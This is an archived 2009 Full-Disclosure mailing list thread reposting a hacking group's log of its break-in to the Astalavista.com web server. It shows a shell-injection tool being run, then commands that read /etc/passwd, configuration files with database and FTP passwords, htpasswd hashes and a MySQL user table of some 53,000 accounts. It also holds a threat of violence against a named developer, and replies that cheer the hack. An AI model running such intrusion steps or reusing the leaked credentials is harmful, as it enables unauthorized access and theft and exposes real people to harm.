[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Astalavista.com Exposed



I agree! Nice documentation of the hack.

On Mon, Jun 8, 2009 at 4:39 PM, Anders Klixbull <akl@xxxxxxxxxxx> wrote:

>  OH MY GOD I DONT KNOW BUT DO WE REALLY CARE????
> their site was always a crappy piece of shit
>
>  ------------------------------
> *From:* full-disclosure-bounces@xxxxxxxxxxxxxxxxx [mailto:
> full-disclosure-bounces@xxxxxxxxxxxxxxxxx] *On Behalf Of *Charles Majola
> *Sent:* 8. juni 2009 14:40
> *To:* srshaxsir@xxxxxxxxxxxx
> *Cc:* full-disclosure@xxxxxxxxxxxxxxxxx
> *Subject:* Re: [Full-disclosure] Astalavista.com Exposed
>
> Good lord man, have they fixed this yet?
> On Fri, Jun 5, 2009 at 3:58 AM, <srshaxsir@xxxxxxxxxxxx> wrote:
>
>> Astalavista.com
>> Astalavista.net
>>                                  The Hacking & Security Community
>>  [+] Founded in 1997 by a hacker computer enthusiast
>>  [-] Exposed in 2009 by anti-sec group
>>
>> >From <http://astalavista.com/faq>:
>> >> 03. Who's behind the site?
>> >>
>> >> A team of security and IT professionals, and a countless number
>> of contributors from all over the world.
>>
>> >> 05. Is it true that the site is visited by script-kiddies and
>> warez fans only?
>> >>
>> >> Absolutely not! The audience behind the site consists of home
>> users, worldwide companies and corporations, educational and non-
>> profit organizations, government and military institutions.
>> >> All of these have been visiting the site on a daily basis for
>> the past couple of years, contributing in various ways, or
>> requesting services and information.
>>
>> Why has Astalavista been targeted?
>>
>> Other than the fact that they are not doing any of this for the
>> "community" but
>> for the money, they spread exploits for kids, claim to be a
>> security community
>> (with no real sense of security on their own servers), and they
>> charge you $6.66
>> per months to access a dead forum with a directory filled with
>> public releases
>> and outdated / broken services.
>>
>> We wanted to see how good that "team of security and IT
>> professionals" really is.
>>
>> Let's begin.
>>
>> anti-sec:~# ./g0tshell astalavista.com -p 80
>>        [+] Connecting to astalavista.com:80
>>        [+] Grabbing banner...
>>                LiteSpeed
>>        [+] Injecting shellcode...
>>        [-] Wait for it
>>
>>        [~] We g0tshell
>>                uname -a: Linux asta1.astalavistaserver.com2.6.18-128.1.10.el5
>> #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
>>                ID: uid=100(apache) gid=500(apache) groups=500(apache)
>>
>> sh-3.2$ cat /etc/passwd
>> root:x:0:0:root:/root:/bin/bash
>> bin:x:1:1:bin:/bin:/sbin/nologin
>> daemon:x:2:2:daemon:/sbin:/sbin/nologin
>> adm:x:3:4:adm:/var/adm:/sbin/nologin
>> lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
>> sync:x:5:0:sync:/sbin:/bin/sync
>> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
>> halt:x:7:0:halt:/sbin:/sbin/halt
>> mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
>> news:x:9:13:news:/etc/news:
>> uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
>> operator:x:11:0:operator:/root:/sbin/nologin
>> games:x:12:100:games:/usr/games:/sbin/nologin
>> gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
>> ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
>> nobody:x:99:99:Nobody:/:/sbin/nologin
>> rpm:x:37:37::/var/lib/rpm:/sbin/nologin
>> dbus:x:81:81:System message bus:/:/sbin/nologin
>> nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
>> mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
>> smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
>> vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
>> haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
>> rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
>> rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
>> nfsnobody:x:4294967294:4294967294:Anonymous NFS
>> User:/var/lib/nfs:/sbin/nologin
>> sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
>> pcap:x:77:77::/var/arpwatch:/sbin/nologin
>> named:x:25:25:Named:/var/named:/sbin/nologin
>> apache:x:100:500::/var/www:/bin/false
>> diradmin:x:101:101::/usr/local/directadmin:/bin/bash
>> mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
>> webapps:x:500:501::/var/www/html:/bin/bash
>> majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
>> admin:x:501:502::/home/admin:/bin/bash
>> jon:x:502:503::/home/jon:/bin/bash
>> com:x:503:504::/home/com:/bin/bash
>> ntp:x:38:38::/etc/ntp:/sbin/nologin
>> ais:x:39:39:openais Standards Based Cluster
>> Framework:/:/sbin/nologin
>> astanet:x:504:505::/home/astanet:/bin/bash
>> avahi:x:70:70:Avahi daemon:/:/sbin/nologin
>> avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-
>> autoipd:/sbin/nologin
>>
>> sh-3.2$ cat /etc/hosts
>> # Do not remove the following line, or various programs
>> # that require network functionality will fail.
>> 127.0.0.1       localhost.localdomain   localhost
>> ::1     localhost6.localdomain6 localhost6
>> 80.74.154.172           asta1.astalavistaserver.com
>>
>> sh-3.2$ pwd
>> /home/com/public_html
>>
>> sh-3.2$ ls -la
>> total 18460
>> drwxr-xr-x 30 com apache     4096 May 28 17:06 .
>> drwx--x--x 11 com com        4096 Jun 25  2008 ..
>> drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
>> drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
>> drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
>> drwxrwxrwx  2 com com        4096 May 19 00:50 config
>> drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
>> drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
>> drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
>> drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
>> drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
>> -rw-r--r--  1 com com        8035 May 19 14:26
>> directory_to_mediadir.php
>> drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
>> drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
>> -rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico
>> drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
>> -rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
>> -rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-
>> 21.bak
>> -rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-
>> 11.bak
>> drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
>> drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
>> -rw-r--r--  1 com com       97496 Jun  2 13:01 index.php
>> drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
>> drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
>> drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
>> drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
>> drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
>> drwxr-xr-x 34 com com        4096 May 28 16:30 modules
>> drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
>> drwxrwxr-x 22 com com        4096 May 28 17:06 _new
>> drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
>> drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
>> drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
>> -rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt
>> -rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
>> -rw-r--r--  1 com com         223 Mar 30 15:32 test.php
>> drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
>> drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
>> drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
>>
>> sh-3.2$ head -20 index.php
>> <?php
>>
>> /**
>>  * The main page for the CMS
>>  * @copyright   CONTREXX CMS - COMVATION AG
>>  * @author      Comvation Development Team
>>  * @version     v1.0.9.10.1 stable
>>  * @package        contrexx
>>  * @subpackage    core
>>  * @link        http://www.contrexx.com/ contrexx homepage
>>  * @since       v0.0.0.0
>>  * @todo        Capitalize all class names in project
>>  * @uses        /config/configuration.php
>>  * @uses        /config/settings.php
>>  * @uses        /config/version.php
>>  * @uses        /core/API.php
>>  * @uses        /core_modules/cache/index.class.php
>>  * @uses        /core/error.class.php
>>  * @uses        /core_modules/banner/index.class.php
>>  * @uses        /core_modules/contact/index.class.php
>>
>> sh-3.2$ cd config/
>> sh-3.2$ ls -la
>> total 32
>> drwxrwxrwx  2 com com    4096 May 19 00:50 .
>> drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
>> -rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
>> -rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
>> -rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
>> -rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
>>
>> sh-3.2$ cat configuration.php
>> [snip]
>> $_DBCONFIG['host'] = 'localhost'; // This is normally set to
>> localhost
>> $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
>> $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
>> $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
>> $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
>> $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g.
>> mysql,postgres ..)
>> $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8,
>> ..)
>> [snip]
>> $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
>> $_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
>> $_FTPCONFIG['host']     = 'localhost';// This is normally set to
>> localhost
>> $_FTPCONFIG['port'] = 21; // Ftp remote port
>> $_FTPCONFIG['username'] = 'dev@xxxxxxxxxxxxxxx'; // Ftp login
>> username
>> $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
>> $_FTPCONFIG['path']     = '/'; // Ftp path to cms
>>
>> sh-3.2$ cd ..
>> sh-3.2$ cd dvd/
>> sh-3.2$ ls -la
>> total 2913780
>> drwxr-xr-x  2 com com          4096 Sep  9  2008 .
>> drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
>> -rw-r--r--  1 com com    1050061483 May 16  2008
>> astalavista_security_toolbox_dvd_2008.part1.rar
>> -rw-r--r--  1 com com    1050061483 May 16  2008
>> astalavista_security_toolbox_dvd_2008.part2.rar
>> -rw-r--r--  1 com com     880644069 May 16  2008
>> astalavista_security_toolbox_dvd_2008.part3.rar
>> -rw-r--r--  1 com com           115 Jan 29  2008 .htaccess
>>
>> sh-3.2$ cat .htaccess
>> authType Basic
>> authName DVD
>> authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
>> require valid-user
>>
>> sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
>> DVDdownload:CRD8cuY6.MPT6
>> DVDdownload2:CR8a36.wluFMg
>>
>> sh-3.2$ cat test.php
>> <?php
>> $url =
>> 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc
>> 0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
>> $url = str_replace(array('&amp;', '&#38;'), '&',
>> base64_decode(rawurldecode($url)));
>> echo $url;
>> ?>
>>
>> sh-3.2$ cd modifications/
>> sh-3.2$ ls -la
>> total 32
>> drwxr-xr-x  8 com com    4096 May 11 12:48 .
>> drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
>> drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
>> drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
>> drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
>> drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
>> drwxr-xr-x  2 com com    4096 Feb  2 19:33 search
>> drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
>>
>> sh-3.2$ ls -R
>> .:
>> com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
>>
>> ./com_avtng:
>> avtng.php  banner_bottom.inc.php  banner_button.inc.php
>> banner_content.inc.php  banner_popunder.inc.php
>> banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
>>
>> ./com_avtng/scripts:
>> popunder.js
>>
>> ./cronjobs:
>> exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh
>> proxydb2.php  proxydb.php  securitynews.php  tmp
>>
>> ./cronjobs/tmp:
>> contrexx_module_onlinetools_defaultports.csv
>> contrexx_module_onlinetools_geolitecity_country.csv
>>
>> ./onlinetools:
>> index.php
>>
>> ./pjirc:
>> a_big.jpg          english.lng       img              irc.jar
>>    NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-
>> unsigned.cab  thanks.txt
>> AppletWithJS.html  french.lng        IRCApplet.class  irc-
>> unsigned.jar  pixx.cab           pixx.jar         readme.txt
>> SimpleApplet.html        versions.txt
>> background.gif     HeavyApplet.html  irc.cab          license.txt
>>    pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
>>
>> ./pjirc/img:
>> ange.gif    bombe.gif   clin-oeuil.gif         content.gif
>> enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif
>>  portable.gif   sapin.gif    triste.gif
>> arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif
>> femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-
>> noel.gif  pouce-non.gif  sleep.gif    verre-eau.gif
>> argh.gif    bouqin.gif  coeur-brise.gif        diable.gif
>> fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif
>>  pouce-oui.gif  soleil.gif   verre-vin.gif
>> ballon.gif  cadeau.gif  coeur.gif              dwchat.gif
>> fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif
>>  roll-eyes.gif  sourire.gif  yinyang.gif
>> biere.gif   chien.gif   comprends-pas.gif      enerve1.gif
>> fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif
>>  rouge.gif      terre.gif
>>
>> ./pjirc/snd:
>> bell2.au  ding.au
>>
>> ./search:
>> searchEngines.php  search.php
>>
>> ./_tmp:
>> defaultPorts.php  defaultPorts.txt
>>
>> sh-3.2$ cd cronjobs/
>> sh-3.2$ cat exploits.php
>> [snip]
>> $categories   = array();
>> $milw0rmFile  = FULLPATH .
>> '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
>> $expolits     = file($milw0rmFile);
>> $comExploits  = array();
>> [snip]
>> // manage data
>> for ($x = 0; $x < count($expolits); $x++){ // count($expolits) -
>> 2640
>>
>>    // get path and title
>>    $expolits[$x] = trim($expolits[$x]);
>>    $path         = str_replace('./', FULLPATH .
>> '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0,
>> strpos($expolits[$x], ' ')));
>>    $title        = htmlspecialchars(substr($expolits[$x],
>> strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
>>
>>    // check if file exists
>>    if (file_exists($path)) {
>>
>>        $text = file_get_contents($path);
>>
>>        // get content and date
>>        //$text = htmlspecialchars($text, ENT_QUOTES);
>>        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-
>> 8"));
>>        if ($tmptext != '') {
>>            $text = $tmptext;
>>        } else {
>>            $text = addslashes(htmlentities($text,  ENT_QUOTES));
>>        }
>>        $date = str_replace('milw0rm.com [', '', str_replace(']',
>> '', strstr($text, 'milw0rm.com [')));
>>        $tmp  = explode('-', $date);
>>        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]),
>> trim($tmp[0]));
>>        $cat  = getCategory ($path);
>>        $ext  = pathinfo(basename($path));
>>        $ext  = $ext['extension'];
>>        $qStr = "
>>            SELECT  `id`
>>            FROM    `contrexx_module_exploits`
>>            WHERE   `title`  =  '" . $title . "'
>>            AND     `date`   =  '" . $date . "'
>>        ";
>>        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr .
>> "\n";
>>        $q = $_objDB->query($qStr);
>>
>>        if ($q->numRows() == 0) {
>>
>>            // prepare array
>>            $comExploits[$x]['date']      = $date;
>>            $comExploits[$x]['title']     = $title;
>>            $comExploits[$x]['author']    = 'milw0rm';
>>            $comExploits[$x]['text']      = $text;
>>            $comExploits[$x]['source']    = $ext;
>>            $comExploits[$x]['url1']      = '';
>>            $comExploits[$x]['url2']      = '';
>>            $comExploits[$x]['catid']     = $cat;
>>            $comExploits[$x]['lang']      = '2';
>>            $comExploits[$x]['userid']    = '12';
>>            $comExploits[$x]['startdate'] = '0000-00-00';
>>            $comExploits[$x]['enddate']   = '0000-00-00';
>>            $comExploits[$x]['status']    = '1';
>>            $comExploits[$x]['changelog'] = $date;
>>
>>        }
>> [snip]
>>    $xml = '<?xml version="1.0" encoding="UTF-8"?>
>> <rss version="2.0">
>>    <channel>
>>        <title>ASTALAVISTA.com - Exploits</title>
>>        <link>http://www.astalavista.com/exploits</link>
>>        <description>All availably Exploits.</description>
>>        <language>en-us</language>
>>        <lastBuildDate>' . date('F, j M Y H:i:s O') .
>> '</lastBuildDate>
>>        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
>>        <generator>Astalavista.com</generator>
>>        <webMaster>info@xxxxxxxxxxxxxxx</webMaster>' . $items . '
>>    </channel>
>> </rss>';
>>
>>
>>    if (file_exists(FULLPATH . '/feed/exploits.xml')) {
>>        unlink (FULLPATH . '/feed/exploits.xml');
>>    }
>>
>>
>>    file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
>> [snip]
>>
>> sh-3.2$ cat exploits.sh
>> #!/bin/sh
>>
>> ###########################################################
>> #                                                         #
>> #   Title:        milw0rm exploits adder                  #
>> #   Description:  Add all milw0rm exploits to the         #
>> #                 Astalavista.com database                #
>> #                                                         #
>> #   Company:      Astalavista Group                       #
>> #   Author:       Paulo M. Santos                         #
>> #   E-Mail:       paulo.santos@xxxxxxxxxxxxxx             #
>> #                                                         #
>> ###########################################################
>>
>>
>> # path
>> this_path=/home/com/public_html/modifications/cronjobs
>>
>> # change directory
>> cd $this_path
>> cd tmp/
>>
>> # delete files
>> rm -rf milw0rm.tar.* &
>> rm -rf milw0rm/ &
>>
>> # wget milw0rm paket
>> wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
>>
>> # extract milw0rm paket
>> tar -xvf milw0rm.tar.bz2
>>
>> # change owner
>> chown -R com .
>> chgrp -R com .
>>
>> # execute php script
>> cd $this_path
>> php -q exploits.php
>>
>> # delete files
>> rm -rf tmp/milw0rm.tar.*
>> rm -rf tmp/milw0rm/
>>
>> sh-3.2$ echo "Paulo M. Santos needs to be shot down."
>> Paulo M. Santos needs to be shot down.
>>
>> mysql -u contrexxuser2 -p
>> Enter password:
>> Welcome to the MySQL monitor.  Commands end with ; or \g.
>> Your MySQL connection id is 261694
>> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>>
>> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>>
>> mysql> show databases;
>> +--------------------+
>> | Database           |
>> +--------------------+
>> | information_schema |
>> | com_contrexx2      |
>> | com_contrexx2_live |
>> | test               |
>> +--------------------+
>> 4 rows in set (0.00 sec)
>>
>> mysql> use com_contrexx2_live
>> Database changed
>> mysql> show tables;
>> +--------------------------------------------------+
>> | Tables_in_com_contrexx2_live                     |
>> +--------------------------------------------------+
>> | cc_banner_counter                                |
>> | cc_search_counter                                |
>> | contrexx_access_group_dynamic_ids                |
>> | contrexx_access_group_static_ids                 |
>> | contrexx_access_rel_user_group                   |
>> | contrexx_access_settings                         |
>> | contrexx_access_user_attribute                   |
>> | contrexx_access_user_attribute_name              |
>> | contrexx_access_user_attribute_value             |
>> | contrexx_access_user_core_attribute              |
>> | contrexx_access_user_groups                      |
>> | contrexx_access_user_mail                        |
>> | contrexx_access_user_profile                     |
>> | contrexx_access_user_title                       |
>> | contrexx_access_user_validity                    |
>> | contrexx_access_users                            |
>> | contrexx_backend_areas                           |
>> | contrexx_backups                                 |
>> | contrexx_content                                 |
>> | contrexx_content_history                         |
>> | contrexx_content_logfile                         |
>> | contrexx_content_navigation                      |
>> | contrexx_content_navigation_history              |
>> | contrexx_ids                                     |
>> | contrexx_languages                               |
>> | contrexx_lib_country                             |
>> | contrexx_log                                     |
>> | contrexx_module_alias_source                     |
>> | contrexx_module_alias_target                     |
>> | contrexx_module_block_blocks                     |
>> | contrexx_module_block_rel_lang                   |
>> | contrexx_module_block_rel_pages                  |
>> | contrexx_module_block_settings                   |
>> | contrexx_module_blog_categories                  |
>> | contrexx_module_blog_comments                    |
>> | contrexx_module_blog_message_to_category         |
>> | contrexx_module_blog_messages                    |
>> | contrexx_module_blog_messages_lang               |
>> | contrexx_module_blog_networks                    |
>> | contrexx_module_blog_networks_lang               |
>> | contrexx_module_blog_settings                    |
>> | contrexx_module_blog_votes                       |
>> | contrexx_module_calendar                         |
>> | contrexx_module_calendar_access                  |
>> | contrexx_module_calendar_categories              |
>> | contrexx_module_calendar_form_data               |
>> | contrexx_module_calendar_form_fields             |
>> | contrexx_module_calendar_registrations           |
>> | contrexx_module_calendar_settings                |
>> | contrexx_module_calendar_style                   |
>> | contrexx_module_contact_form                     |
>> | contrexx_module_contact_form_data                |
>> | contrexx_module_contact_form_field               |
>> | contrexx_module_contact_settings                 |
>> | contrexx_module_data_categories                  |
>> | contrexx_module_data_message_to_category         |
>> | contrexx_module_data_messages                    |
>> | contrexx_module_data_messages_lang               |
>> | contrexx_module_data_placeholders                |
>> | contrexx_module_data_settings                    |
>> | contrexx_module_directory_access                 |
>> | contrexx_module_directory_categories             |
>> | contrexx_module_directory_dir                    |
>> | contrexx_module_directory_inputfields            |
>> | contrexx_module_directory_levels                 |
>> | contrexx_module_directory_mail                   |
>> | contrexx_module_directory_rel_dir_cat            |
>> | contrexx_module_directory_rel_dir_level          |
>> | contrexx_module_directory_settings               |
>> | contrexx_module_directory_settings_google        |
>> | contrexx_module_directory_vote                   |
>> | contrexx_module_docsys                           |
>> | contrexx_module_docsys_categories                |
>> | contrexx_module_egov_configuration               |
>> | contrexx_module_egov_orders                      |
>> | contrexx_module_egov_product_calendar            |
>> | contrexx_module_egov_product_fields              |
>> | contrexx_module_egov_products                    |
>> | contrexx_module_egov_settings                    |
>> | contrexx_module_exploits                         |
>> | contrexx_module_exploits_categories              |
>> | contrexx_module_feed_category                    |
>> | contrexx_module_feed_news                        |
>> | contrexx_module_feed_newsml_association          |
>> | contrexx_module_feed_newsml_categories           |
>> | contrexx_module_feed_newsml_documents            |
>> | contrexx_module_feed_newsml_providers            |
>> | contrexx_module_forum_access                     |
>> | contrexx_module_forum_categories                 |
>> | contrexx_module_forum_categories_lang            |
>> | contrexx_module_forum_notification               |
>> | contrexx_module_forum_postings                   |
>> | contrexx_module_forum_rating                     |
>> | contrexx_module_forum_settings                   |
>> | contrexx_module_forum_statistics                 |
>> | contrexx_module_gallery_categories               |
>> | contrexx_module_gallery_comments                 |
>> | contrexx_module_gallery_language                 |
>> | contrexx_module_gallery_language_pics            |
>> | contrexx_module_gallery_pictures                 |
>> | contrexx_module_gallery_settings                 |
>> | contrexx_module_gallery_votes                    |
>> | contrexx_module_guestbook                        |
>> | contrexx_module_guestbook_settings               |
>> | contrexx_module_livecam                          |
>> | contrexx_module_livecam_settings                 |
>> | contrexx_module_market                           |
>> | contrexx_module_market_access                    |
>> | contrexx_module_market_categories                |
>> | contrexx_module_market_mail                      |
>> | contrexx_module_market_paypal                    |
>> | contrexx_module_market_settings                  |
>> | contrexx_module_market_spez_fields               |
>> | contrexx_module_mediadir_access                  |
>> | contrexx_module_mediadir_categories              |
>> | contrexx_module_mediadir_comments                |
>> | contrexx_module_mediadir_dir                     |
>> | contrexx_module_mediadir_inputfields             |
>> | contrexx_module_mediadir_levels                  |
>> | contrexx_module_mediadir_mail                    |
>> | contrexx_module_mediadir_rel_dir_cat             |
>> | contrexx_module_mediadir_rel_dir_level           |
>> | contrexx_module_mediadir_reports                 |
>> | contrexx_module_mediadir_settings                |
>> | contrexx_module_mediadir_settings_google         |
>> | contrexx_module_mediadir_vote                    |
>> | contrexx_module_memberdir_directories            |
>> | contrexx_module_memberdir_name                   |
>> | contrexx_module_memberdir_settings               |
>> | contrexx_module_memberdir_values                 |
>> | contrexx_module_nettools_allowed_groups          |
>> | contrexx_module_nettools_settings                |
>> | contrexx_module_news                             |
>> | contrexx_module_news_access                      |
>> | contrexx_module_news_categories                  |
>> | contrexx_module_news_settings                    |
>> | contrexx_module_news_teaser_frame                |
>> | contrexx_module_news_teaser_frame_templates      |
>> | contrexx_module_news_ticker                      |
>> | contrexx_module_newsletter                       |
>> | contrexx_module_newsletter_attachment            |
>> | contrexx_module_newsletter_category              |
>> | contrexx_module_newsletter_confirm_mail          |
>> | contrexx_module_newsletter_rel_cat_news          |
>> | contrexx_module_newsletter_rel_user_cat          |
>> | contrexx_module_newsletter_settings              |
>> | contrexx_module_newsletter_template              |
>> | contrexx_module_newsletter_tmp_sending           |
>> | contrexx_module_newsletter_user                  |
>> | contrexx_module_newsletter_user_title            |
>> | contrexx_module_onlinetools_defaultports         |
>> | contrexx_module_onlinetools_defaultports_back    |
>> | contrexx_module_onlinetools_geolitecity_blocks   |
>> | contrexx_module_onlinetools_geolitecity_country  |
>> | contrexx_module_onlinetools_geolitecity_location |
>> | contrexx_module_podcast_category                 |
>> | contrexx_module_podcast_medium                   |
>> | contrexx_module_podcast_rel_category_lang        |
>> | contrexx_module_podcast_rel_medium_category      |
>> | contrexx_module_podcast_settings                 |
>> | contrexx_module_podcast_template                 |
>> | contrexx_module_proxydb                          |
>> | contrexx_module_recommend                        |
>> | contrexx_module_repository                       |
>> | contrexx_module_securitynews_cats                |
>> | contrexx_module_securitynews_feeds               |
>> | contrexx_module_securitynews_news                |
>> | contrexx_module_shop_categories                  |
>> | contrexx_module_shop_config                      |
>> | contrexx_module_shop_countries                   |
>> | contrexx_module_shop_currencies                  |
>> | contrexx_module_shop_customers                   |
>> | contrexx_module_shop_importimg                   |
>> | contrexx_module_shop_lsv                         |
>> | contrexx_module_shop_mail                        |
>> | contrexx_module_shop_mail_content                |
>> | contrexx_module_shop_manufacturer                |
>> | contrexx_module_shop_order_items                 |
>> | contrexx_module_shop_order_items_attributes      |
>> | contrexx_module_shop_orders                      |
>> | contrexx_module_shop_payment                     |
>> | contrexx_module_shop_payment_processors          |
>> | contrexx_module_shop_pricelists                  |
>> | contrexx_module_shop_products                    |
>> | contrexx_module_shop_products_attributes         |
>> | contrexx_module_shop_products_attributes_name    |
>> | contrexx_module_shop_products_attributes_value   |
>> | contrexx_module_shop_products_downloads          |
>> | contrexx_module_shop_rel_countries               |
>> | contrexx_module_shop_rel_payment                 |
>> | contrexx_module_shop_rel_shipment                |
>> | contrexx_module_shop_shipment_cost               |
>> | contrexx_module_shop_shipper                     |
>> | contrexx_module_shop_vat                         |
>> | contrexx_module_shop_zones                       |
>> | contrexx_module_u2u_address_list                 |
>> | contrexx_module_u2u_message_log                  |
>> | contrexx_module_u2u_sent_messages                |
>> | contrexx_module_u2u_settings                     |
>> | contrexx_module_u2u_user_log                     |
>> | contrexx_modules                                 |
>> | contrexx_sessions                                |
>> | contrexx_settings                                |
>> | contrexx_settings_smtp                           |
>> | contrexx_skins                                   |
>> | contrexx_stats_browser                           |
>> | contrexx_stats_colourdepth                       |
>> | contrexx_stats_config                            |
>> | contrexx_stats_country                           |
>> | contrexx_stats_hostname                          |
>> | contrexx_stats_javascript                        |
>> | contrexx_stats_operatingsystem                   |
>> | contrexx_stats_referer                           |
>> | contrexx_stats_requests                          |
>> | contrexx_stats_requests_summary                  |
>> | contrexx_stats_screenresolution                  |
>> | contrexx_stats_search                            |
>> | contrexx_stats_spiders                           |
>> | contrexx_stats_spiders_summary                   |
>> | contrexx_stats_visitors                          |
>> | contrexx_stats_visitors_summary                  |
>> | contrexx_voting_additionaldata                   |
>> | contrexx_voting_email                            |
>> | contrexx_voting_rel_email_system                 |
>> | contrexx_voting_results                          |
>> | contrexx_voting_system                           |
>> | foo                                              |
>> +--------------------------------------------------+
>> 227 rows in set (0.01 sec)
>>
>> mysql> select count(*) as skids from contrexx_access_users;
>> +-------+
>> | skids |
>> +-------+
>> | 53699 |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql> describe contrexx_access_users;
>> +------------------+------------------------------------------+-----
>> -+-----+--------------+----------------+
>> | Field            | Type                                     |
>> Null | Key | Default      | Extra          |
>> +------------------+------------------------------------------+-----
>> -+-----+--------------+----------------+
>> | id               | int(10) unsigned                         | NO
>>  | PRI | NULL         | auto_increment |
>> | is_admin         | tinyint(1) unsigned                      | NO
>>  |     | 0            |                |
>> | username         | varchar(40)                              | YES
>>  | MUL | NULL         |                |
>> | password         | varchar(32)                              | YES
>>  |     | NULL         |                |
>> | regdate          | int(14) unsigned                         | NO
>>  |     | 0            |                |
>> | expiration       | int(14) unsigned                         | NO
>>  |     | 0            |                |
>> | validity         | int(10) unsigned                         | NO
>>  |     | 0            |                |
>> | last_auth        | int(14) unsigned                         | NO
>>  |     | 0            |                |
>> | last_activity    | int(14) unsigned                         | NO
>>  |     | 0            |                |
>> | email            | varchar(255)                             | YES
>>  |     | NULL         |                |
>> | email_access     | enum('everyone','members_only','nobody') | NO
>>  |     | nobody       |                |
>> | frontend_lang_id | int(2) unsigned                          | NO
